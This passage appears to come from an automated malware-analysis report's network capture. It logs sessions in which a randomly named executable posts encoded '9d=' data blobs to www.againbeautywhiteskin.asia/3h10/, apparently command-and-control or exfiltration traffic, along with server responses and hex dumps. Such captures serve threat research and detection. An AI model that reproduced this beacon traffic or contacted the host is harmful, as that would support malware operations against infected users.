Jun 5, 2024 18:27:53.448352098 CEST	1236	IN	Data Raw: 65 72 20 6c 6f 61 64 20 2d 2d 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 66 75 6e 63 74 69 6f 6e 28 65 76 65 6e 74 29 20 Data Ascii: er load --> <script> window.addEventListener("load",function(event) { init(); }); function init(){ var image = document.getElementById('background-image'); var body = d
Jun 5, 2024 18:27:53.448367119 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 6f 6f 70 3a 20 74 72 75 65 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 61 72 74 41 74 3a 20 73 72 63 2e 6c 65 6e 67 74 68 20 3e 20 Data Ascii: loop: true, startAt: src.length > 1 ? src[1] : '0', showPosterBeforePlay: true }); </script>
Jun 5, 2024 18:27:53.448375940 CEST	1236	IN	Data Raw: 79 70 6f 74 3d 26 65 6d 61 69 6c 3d 24 7b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 6d 61 69 6c 49 6e 70 75 74 2e 76 61 6c 75 65 29 20 7d 26 66 69 72 73 74 6e 61 6d 65 3d 24 7b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e Data Ascii: ypot=&email=${ encodeURIComponent(emailInput.value) }&firstname=${ encodeURIComponent(firstname) }&lastname=${ encodeURIComponent(lastname) }&security=${ security }&token=${ token }`, credentials: 'same-origin'
Jun 5, 2024 18:27:53.448388100 CEST	372	IN	Data Raw: 27 4f 6f 70 73 21 20 45 6d 61 69 6c 20 69 73 20 65 6d 70 74 79 2e 27 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 21 2d 2d 20 42 75 69 6c 64 20 62 79 Data Ascii: 'Oops! Email is empty.'; } } </script>... Build by CMP Coming Soon Maintenance Plugin by NiteoThemes -->... Visit plugin page https://wordpress.org/plugins/cmp-coming-soon-maintenance/ -->... More CMP
Jun 5, 2024 18:27:53.448532104 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49723	13.228.81.39	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:27:59.675080061 CEST	741	OUT	POST /3h10/ HTTP/1.1 Host: www.againbeautywhiteskin.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 215 Origin: http://www.againbeautywhiteskin.asia Referer: http://www.againbeautywhiteskin.asia/3h10/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 77 6b 78 72 55 39 6e 53 42 66 4f 4b 4f 7a 45 59 6d 63 4d 72 34 34 70 30 30 66 68 53 67 6c 33 66 50 4e 53 5a 48 77 41 44 5a 64 41 74 72 5a 4f 43 6a 69 56 52 6a 72 31 55 37 48 4f 41 64 51 35 59 4f 78 4b 4d 52 38 62 42 58 62 46 70 64 47 39 36 56 62 44 74 48 68 56 4d 49 74 51 30 4f 6f 37 33 71 2b 49 6c 49 57 48 5a 48 54 61 49 4f 4f 38 64 77 50 57 65 35 7a 47 42 6d 38 55 47 50 4a 38 59 36 7a 4f 50 68 6a 36 6b 34 65 38 53 75 78 51 64 43 63 44 33 5a 77 44 41 54 72 30 68 48 73 68 77 2b 47 5a 66 5a 50 68 6a 45 57 55 70 61 46 6d 30 46 37 48 64 53 4e 46 39 64 61 75 65 32 45 34 34 75 78 6a 59 79 4c 7a 55 31 51 43 49 53 67 62 6d 30 67 3d 3d Data Ascii: 9d=wkxrU9nSBfOKOzEYmcMr44p00fhSgl3fPNSZHwADZdAtrZOCjiVRjr1U7HOAdQ5YOxKMR8bBXbFpdG96VbDtHhVMItQ0Oo73q+IlIWHZHTaIOO8dwPWe5zGBm8UGPJ8Y6zOPhj6k4e8SuxQdCcD3ZwDATr0hHshw+GZfZPhjEWUpaFm0F7HdSNF9daue2E44uxjYyLzU1QCISgbm0g==
Jun 5, 2024 18:28:00.696891069 CEST	1236	IN	HTTP/1.1 200 OK Server: openresty Date: Wed, 05 Jun 2024 16:28:00 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0 Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p Data Raw: Data Ascii:
Jun 5, 2024 18:28:00.696897984 CEST	212	IN	Data Raw: 70 75 70 78 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 2a 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 73 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 67 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f Data Ascii: pupx.ladi.me https://.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://.ladicdn.com https://www.facebook.com https://*.facebook.comSet-Cookie: LADI_DNS_CHECK="2024-06-05 16:28
Jun 5, 2024 18:28:00.696902037 CEST	1236	IN	Data Raw: 3a 30 30 2e 35 30 31 39 32 30 33 30 33 20 2b 30 30 30 30 20 55 54 43 20 6d 3d 2b 32 30 31 36 37 31 30 2e 30 35 33 31 35 33 32 31 38 22 3b 20 45 78 70 69 72 65 73 3d 53 61 74 2c 20 30 33 20 4a 75 6e 20 32 30 33 34 20 31 36 3a 32 38 3a 30 30 20 47 Data Ascii: :00.501920303 +0000 UTC m=+2016710.053153218"; Expires=Sat, 03 Jun 2034 16:28:00 GMTSet-Cookie: LADI_CLIENT_ID=01e955b3-5d3a-40e1-6eb9-e4647531fe9b; Expires=Sat, 03 Jun 2034 16:28:00 GMTSet-Cookie: LADI_PAGE_VIEW=0; Path=/3h10; Expires=Sat
Jun 5, 2024 18:28:00.696949005 CEST	1236	IN	Data Raw: 52 5f 50 41 47 45 5f 56 49 45 57 3d 3b 20 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 42 45 48 41 56 49 4f 52 5f 50 41 47 45 5f 56 49 45 57 5f 50 41 54 48 Data Ascii: R_PAGE_VIEW=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT_PATH=; Path=/3h10; Max-Age
Jun 5, 2024 18:28:00.696966887 CEST	582	IN	Data Raw: 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 42 45 48 41 56 49 4f 52 5f 50 41 47 45 5f 56 49 45 57 3d 3b 20 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d Data Ascii: Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT=; Path=/3h10; Max-Age=0Set-Cookie: LADI
Jun 5, 2024 18:28:00.697345018 CEST	1236	IN	Data Raw: 31 34 30 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 3c db 8e db 48 76 bf 52 d6 62 a6 25 b8 a8 96 ba 5b 7d 91 5a 3d f1 38 4e 76 80 c1 8e 31 e3 d9 ec c2 70 8c 12 59 92 38 4d 91 34 49 f5 c5 da 7e 08 f2 98 87 60 9f f3 92 c1 60 10 20 40 80 20 c8 d3 fa Data Ascii: 140c<HvRb%[}Z=8Nv1pY8M4I~`` @ SU$d-YS^.</~'Tsv#E1Oo_u:;Mg](${1n=e[O?Elx>xi;-u/67E$H
Jun 5, 2024 18:28:00.697366953 CEST	212	IN	Data Raw: 1c ee ec 8c d2 47 01 4b 88 7d a5 d8 6a 43 4c c2 c2 98 0f d3 07 25 41 0b f4 c7 16 22 95 44 69 42 3c 0c 41 12 8b d8 12 74 61 91 c5 9c ef 96 b1 84 2e 05 50 53 15 d4 55 28 b9 1a 6b 6f ba 01 68 c9 14 22 27 6b ee 3a 0e f7 57 e9 fb 50 be df 08 47 69 25 Data Ascii: GK}jCL%A"DiB<Ata.PSU(koh"'k:WPGi%83W%)^\|9Vkn~WaO+P"SHmM:{\|[KuXM}j;h6aRz;FEP:uHqp-
Jun 5, 2024 18:28:00.697379112 CEST	1236	IN	Data Raw: 94 76 10 0d 7f 31 9d 4e 47 25 92 91 36 31 ce 40 0c d3 1f 0c 70 1c 45 6b 24 46 eb 8d 94 bd b3 65 12 a4 6a 12 01 19 cb 18 b8 10 5e ad 4b 25 99 f7 57 15 9c 04 ce 87 74 af 4f 0f 00 eb de a0 33 52 b8 22 63 53 f7 d2 df 03 1a fb 80 99 f4 29 97 92 0b 87 Data Ascii: v1NG%61@pEk$Fej^K%WtO3R"cS)9XbQc"!fI!p9h'+n\|-6ud0vQ4PkU- E+AC?I4H6OZ~}U\|qr.!lpBNr>/)
Jun 5, 2024 18:28:00.697392941 CEST	1236	IN	Data Raw: 68 5c d9 4f a5 17 9d b4 72 96 24 cc 9e a3 ca 98 6a e5 05 bf ac 26 65 8f b8 b4 d3 78 ce 58 47 05 9e 78 af 8f 7f f9 7c fc 7e f1 20 78 2b 6d 55 80 65 d9 dc f3 ca f7 c0 16 60 ae 5e 05 64 c9 de ea 50 bd 6f 11 d4 9f c2 a8 09 52 df 2c ae 41 76 1d d7 97 Data Ascii: h\Or$j&exXGx\|~ x+mUe`^dPoR,Av:8qCK%$r@kbt]S^ZjYJJa%xG5aSF>&C=\|u]I<$X^y !z^??_<Wyju%NZVaV\`T,4M$*\|R
Jun 5, 2024 18:28:00.697405100 CEST	1236	IN	Data Raw: cc a5 d1 3d 6c 0e a4 25 31 a4 c0 3f 19 17 bb 8b d9 4a bb 01 58 d8 36 e8 ef e7 89 42 d2 e4 11 d9 ea 62 b0 9f 3b 57 f1 5c 1f 89 9a 46 17 49 d9 f4 f4 21 1a b8 3e de 33 2e 67 fa d0 4f b7 8f 7a bd 5c c7 31 05 c5 70 02 2b c9 73 0b d3 17 d6 a5 04 b9 9c Data Ascii: =l%1?JX6Bb;W\FI!>3.gOz\1p+sEtNT5AS5@cUG1/,n=V$F=}^i,`XA#jfUN0S9OVX)lU2W~4c{!dv*:9
Jun 5, 2024 18:28:00.702130079 CEST	4	IN	Data Raw: 0d 0a 0d 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49724	13.228.81.39	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:28:02.207586050 CEST	761	OUT	POST /3h10/ HTTP/1.1 Host: www.againbeautywhiteskin.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 235 Origin: http://www.againbeautywhiteskin.asia Referer: http://www.againbeautywhiteskin.asia/3h10/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 77 6b 78 72 55 39 6e 53 42 66 4f 4b 49 53 30 59 70 64 4d 72 77 34 70 33 2f 2f 68 53 75 46 33 62 50 4e 65 5a 48 78 45 54 59 76 6b 74 72 37 57 43 6b 6d 4a 52 67 72 31 55 6a 33 4f 2f 43 67 34 55 4f 78 48 2f 52 34 62 42 58 62 42 70 64 48 4e 36 56 6f 37 75 42 78 56 43 44 4e 51 79 41 49 37 33 71 2b 49 6c 49 56 37 67 48 53 2b 49 50 2b 4d 64 77 74 75 64 36 7a 47 43 75 63 55 47 45 70 38 63 36 7a 50 73 68 69 6e 4c 34 64 45 53 75 31 63 64 43 4e 44 77 51 77 44 47 64 4c 30 76 4d 63 63 4a 77 31 35 76 63 4a 56 70 43 57 59 59 66 7a 37 57 66 5a 4c 78 4d 63 39 47 5a 59 4b 6f 68 69 6c 4e 73 77 6e 41 2f 70 48 31 71 6e 6e 69 66 79 36 69 69 54 37 43 4f 75 58 6a 64 72 37 6e 5a 79 4e 45 56 57 50 44 71 2f 45 3d Data Ascii: 9d=wkxrU9nSBfOKIS0YpdMrw4p3//hSuF3bPNeZHxETYvktr7WCkmJRgr1Uj3O/Cg4UOxH/R4bBXbBpdHN6Vo7uBxVCDNQyAI73q+IlIV7gHS+IP+Mdwtud6zGCucUGEp8c6zPshinL4dESu1cdCNDwQwDGdL0vMccJw15vcJVpCWYYfz7WfZLxMc9GZYKohilNswnA/pH1qnnify6iiT7COuXjdr7nZyNEVWPDq/E=
Jun 5, 2024 18:28:03.255146027 CEST	1236	IN	HTTP/1.1 200 OK Server: openresty Date: Wed, 05 Jun 2024 16:28:03 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0 Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p Data Raw: Data Ascii:
Jun 5, 2024 18:28:03.255167007 CEST	1236	IN	Data Raw: 70 75 70 78 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 2a 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 73 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 67 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f Data Ascii: pupx.ladi.me https://.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://.ladicdn.com https://www.facebook.com https://*.facebook.comSet-Cookie: LADI_DNS_CHECK="2024-06-05 16:28:03.066952259 +0000 UTC m=+2016
Jun 5, 2024 18:28:03.255179882 CEST	1236	IN	Data Raw: 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 5f 50 41 54 48 3d 3b 20 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f Data Ascii: t-Cookie: LADI_CAMP_PAGE_VIEW_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW=; Path=/3h10; Max-A
Jun 5, 2024 18:28:03.255191088 CEST	794	IN	Data Raw: 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 3d 3b 20 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 5f Data Ascii: kie: LADI_CAMP_PAGE_VIEW=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_PAGE_VIEW_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT_PATH=; Path=/3h10; Max-Age=0Set-Cook
Jun 5, 2024 18:28:03.255280972 CEST	1236	IN	Data Raw: 36 33 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 9c 57 51 6f db 36 10 fe 2b ac 86 2d 36 70 72 ec 34 f1 3a 29 ce 30 74 dd 6b 07 ac db b0 a7 80 12 29 89 35 45 2a 24 15 db 35 fc df 77 24 65 d7 76 92 22 68 12 5b e4 dd f1 78 c7 fb ee a3 72 fb e6 f7 8f ef Data Ascii: 637WQo6+-6pr4:)0tk)5E*$5w$ev"h[xr?V;J"'2]\^<.lx^+gLHiU3k>;a=Ng{;E[H\|`6eft=L(@zlq:mq/._F
Jun 5, 2024 18:28:03.255331039 CEST	212	IN	Data Raw: 8b 34 83 cf 6d a7 07 f3 4a ac 11 44 e1 9d 22 a2 75 5f 47 3f c6 77 15 84 b3 e4 95 c3 c7 97 34 bc d7 79 cd f0 93 17 b4 5c 7a 98 28 96 99 ba a0 a3 29 f8 df c9 db f1 d3 1d c9 13 89 07 f8 36 6e 7c 3d 9d e2 11 b7 74 9d c6 39 c2 b6 1c f9 08 48 4a 6e 50 Data Ascii: 4mJD"u_G?w4y\z()6n\|=t9HJnP5>D5C5ZFN7?W[}na3jn\|w;4z_%if'1p5kzz3Xev90)xGbRO8c]R
Jun 5, 2024 18:28:03.255767107 CEST	1236	IN	Data Raw: 5c c5 e2 f9 93 f2 9b c4 4d 4f 38 e1 5d f7 95 ca 82 a2 94 48 e3 d9 db 83 d0 b3 1f 5e f4 be 63 f7 04 99 9f 81 3e 0f bd 72 10 72 29 45 67 85 cd f7 7c 74 e4 ea d5 49 3d 95 96 52 5b 7e ca 71 5f 81 43 0b 84 1b be c2 0e f0 08 75 c1 7f 7e 9c 6e 63 ce fb Data Ascii: \MO8]H^c>rr)Eg\|tI=R[~q_Cu~ncj*r'BGkBV}kJ$D\|@zZdaa]oY$"a}L}YRkFcH[)Rjp&EP/5@EQAIgnwoxGrp"~
Jun 5, 2024 18:28:03.255772114 CEST	212	IN	Data Raw: a7 8f 22 63 aa 65 17 fc 92 1a c1 1e 7a 69 27 f7 9c d1 46 05 9e 78 17 c7 5f 3f 1f 5f 2d 1e 04 6f a5 cd 15 58 4e c7 0f 43 fd 1e d8 00 96 6b 98 01 a9 ad 37 1b aa ab 9e 02 fb 29 0c 37 90 72 b0 d8 82 6c 11 d5 27 14 1c bd c4 78 d3 f3 52 06 85 c8 1f ef Data Ascii: "cezi'Fx_?_-oXNCk7)7rl'xR\SRh.}3<U0pjef(ds(;(e%rYu}L!BnmCJ#B?;]Y!='A>?>x#{m_eHSd
Jun 5, 2024 18:28:03.255793095 CEST	1236	IN	Data Raw: a0 f4 26 a6 d2 54 f0 89 15 65 f8 c4 8b a5 db 5d bc cc 3a 5b 24 ad a0 4e 91 e4 7e 7c f0 f3 58 94 52 bd e6 96 28 5f 01 a6 b2 0e fd f1 f1 51 fe 16 8e 37 53 64 73 a1 07 f1 31 89 07 8c ee f8 92 1a d4 0b f5 6f 9d d2 dd f1 39 d9 1a 9f 4b 5a d8 e4 ef f1 Data Ascii: &Te]:[$N~\|XR(_Q7Sds1o9KZg;+g~\r]rvQ,;zAr)K?=n+\|ZCb)]Li9HvM\|ONGtI[tQlHr0szCuD~~O
Jun 5, 2024 18:28:03.255801916 CEST	212	IN	Data Raw: 99 13 c5 9e e9 d7 49 a1 9e b7 df a5 79 9d de 10 83 89 26 cc 46 17 87 75 bf c5 61 61 1a 2f c2 b8 c1 52 00 ee 91 4a 92 04 b0 52 27 13 f8 03 e0 a2 a0 67 a7 98 fb 04 e5 88 d6 ae ba ce 09 5f c9 84 22 26 6a 9b 52 c5 56 73 a7 b1 43 2b 8f 1e 3e 7f f8 db Data Ascii: Iy&Fuaa/RJR'g_"&jRVsC+>>imE=n6v."h&Vh&,RD:7*##Ry[VYf0N:uSm!gDY)UJP!B0uKLh
Jun 5, 2024 18:28:03.260219097 CEST	779	IN	Data Raw: 0d cd 4c 17 da f5 ba c4 ab ab 27 61 01 6b c0 83 64 77 0e 04 35 1e 91 fc e3 94 c7 f7 58 de 64 5c c3 87 fb dd 60 46 3a a1 37 99 1c 54 e8 28 2c 15 55 85 55 e0 3c 08 a9 aa 28 cd 38 df 2b 32 80 0d cb 8c 6c c0 90 d0 2a 3b 56 a2 61 38 18 3a 5e 2a 76 ea Data Ascii: L'akdw5Xd\`F:7T(,UU<(8+2l;Va8:^vB]0'JjiIT5$CG^^vH\_8WI;/# n3r>Ag+9Bwpv}hqs}27^_~_;}m"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49725	13.228.81.39	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:28:04.740268946 CEST	1774	OUT	POST /3h10/ HTTP/1.1 Host: www.againbeautywhiteskin.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1247 Origin: http://www.againbeautywhiteskin.asia Referer: http://www.againbeautywhiteskin.asia/3h10/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 77 6b 78 72 55 39 6e 53 42 66 4f 4b 49 53 30 59 70 64 4d 72 77 34 70 33 2f 2f 68 53 75 46 33 62 50 4e 65 5a 48 78 45 54 59 76 73 74 6f 49 65 43 6b 42 39 52 68 72 31 55 39 48 4f 45 43 67 35 4f 4f 77 76 67 52 34 65 32 58 5a 4a 70 64 68 35 36 45 70 37 75 49 78 56 43 4d 74 51 7a 4f 6f 36 31 71 2b 59 68 49 56 72 67 48 53 2b 49 50 39 45 64 33 2f 57 64 33 54 47 42 6d 38 55 4b 50 4a 39 44 36 79 6d 58 68 69 53 30 34 74 6b 53 76 52 77 64 4f 66 62 77 66 77 44 45 51 72 31 70 4d 63 51 6f 77 31 31 46 63 4e 56 51 43 52 63 59 63 56 48 4f 4c 61 2f 78 65 65 56 74 65 2f 2b 56 33 77 74 2f 30 52 6e 63 38 59 66 54 72 33 44 69 62 7a 65 58 72 6e 6d 69 56 64 36 52 47 59 72 70 5a 33 45 53 50 56 48 47 78 6f 41 6b 4c 65 65 61 47 71 36 54 50 63 36 63 4f 4a 37 39 59 53 61 2b 63 63 75 6b 41 36 61 74 6d 4d 43 6e 45 7a 66 69 34 61 6b 78 4a 46 65 56 57 39 30 35 51 34 72 68 4b 6b 79 70 4a 73 53 46 4d 66 52 52 74 68 48 6e 66 6f 4d 4c 41 47 66 77 69 37 4d 63 2f 55 73 68 4c 63 63 43 4c 6b 58 73 59 41 77 6b 5a 6c 77 52 54 43 56 [TRUNCATED] Data Ascii: 9d=wkxrU9nSBfOKIS0YpdMrw4p3//hSuF3bPNeZHxETYvstoIeCkB9Rhr1U9HOECg5OOwvgR4e2XZJpdh56Ep7uIxVCMtQzOo61q+YhIVrgHS+IP9Ed3/Wd3TGBm8UKPJ9D6ymXhiS04tkSvRwdOfbwfwDEQr1pMcQow11FcNVQCRcYcVHOLa/xeeVte/+V3wt/0Rnc8YfTr3DibzeXrnmiVd6RGYrpZ3ESPVHGxoAkLeeaGq6TPc6cOJ79YSa+ccukA6atmMCnEzfi4akxJFeVW905Q4rhKkypJsSFMfRRthHnfoMLAGfwi7Mc/UshLccCLkXsYAwkZlwRTCVvFi1KwNQ8g4k8hLsKZaAX5t/VLgyZf8Ihs/7P1QFtEefbF8Cc69pUsN+/a/A1S3qAULyQM15UeYIsJEUAlOXypjHKYL4+R44wIijhbQWAsMU9S6aRCbbzBhItcB8f/kwNiWFA11+jj11ow+bd12ShyP/NHDBUDaywnxKJrQJf/FXr8fr2nxqxLGavuHsLhKxrrmXoHUWy1ynXndKYXD8rILm0HVh1PPFDPx5xZegcZ1T+aquSiRPSaLs4bLA7CFrFbEgOnNVMhZ4nwOHoJg7/5+IZTa97aUHzFDE6yAssc8+jZUvspGYBB9bSeaN6ExOEzVYgCW3EnwU6FREq+Y3glg32wMnlENyiZ01d2rkPJjnB1fLjHSmxb2EcRMvxb/AFSz4UIIebp84D0TOHIq0g/C87Fo15Jn9tGKTK1XBQ7wEdUNyJn/lzgs3dJRaesBJJK+FkwF97n6DsLIk96HTarGpsivuHKnWKkaC+xVVRW+EcuBbCZYnnGrmeXWZrAOrY2JquzLs/zP40nkGqQ4pJBBHXjg4bEb+TSVu/ubWAlFsMT5eR2NWQvj/7JwkFyAQ0BskEoNdXpvqIKVgU/sh7p8cEus4z88qwwPoyPCsJ2oWH9hdLxVyqMSweAG+6JHttUbhdNx9u9t69Mn25kYl8foP5b/M0Hff/g [TRUNCATED]
Jun 5, 2024 18:28:05.763338089 CEST	1236	IN	HTTP/1.1 200 OK Server: openresty Date: Wed, 05 Jun 2024 16:28:05 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0 Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p Data Raw: Data Ascii:
Jun 5, 2024 18:28:05.763436079 CEST	1236	IN	Data Raw: 70 75 70 78 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 2a 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 73 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 67 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f Data Ascii: pupx.ladi.me https://.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://.ladicdn.com https://www.facebook.com https://*.facebook.comSet-Cookie: LADI_DNS_CHECK="2024-06-05 16:28:05.575483656 +0000 UTC m=+2016
